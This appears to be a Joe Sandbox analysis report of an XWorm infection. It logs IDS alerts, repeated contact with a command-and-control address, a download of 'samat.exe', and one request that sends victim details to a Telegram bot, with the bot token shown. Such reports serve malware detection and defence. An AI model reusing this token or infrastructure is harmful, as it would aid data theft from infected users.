                    Source: Joe Sandbox ViewIP Address: 23.57.90.111 23.57.90.111
                    Source: Joe Sandbox ViewIP Address: 152.195.19.97 152.195.19.97
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50337 -> 20.189.173.5:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50147 -> 31.41.244.11:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 188.165.52.14:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: global trafficHTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
                    Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.0af827ee54246cc151b3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.b23f2c737ccf14018cf8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732828390&P2=404&P3=2&P4=AWOCGn%2f5q6RNxVS7%2fjhSYDCixRz%2bmQY0jaYBCPiSYbzX2yFPRgPPwARFz4cZHf%2fElpV3Q%2fz95o15ZDniXBTs1g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: X9nsUlIue40Lh2xDAXDu2pSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1732223700869&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=4a15e35cafd94d159c0b19139d533c19&activityId=4a15e35cafd94d159c0b19139d533c19&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=13B8460915C043F29EE15DCA68DCD589&MUID=00AA082B214465520B5C1D15206D642A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=00AA082B214465520B5C1D15206D642A; _EDGE_S=F=1&SID=1E0A64B8A5A8631F16D67186A4B1627A; _EDGE_V=1; SM=T
                    Source: global trafficHTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: - https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: d- https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: thedotmediagroup.com
                    Source: global trafficDNS traffic detected: DNS query: api.myip.com
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                    Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: c.msn.com
                    Source: global trafficDNS traffic detected: DNS query: api.msn.com
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                    Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php58
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php=
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpA
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpca-11ee-8c18-806e6f6e699
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
                    Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
                    Source: samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.dig
                    Source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503522230.000001BCCC829000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503045992.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508302537.000001BCCC49D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500627948.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508607336.000001BCCC82A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025779747.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC81D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
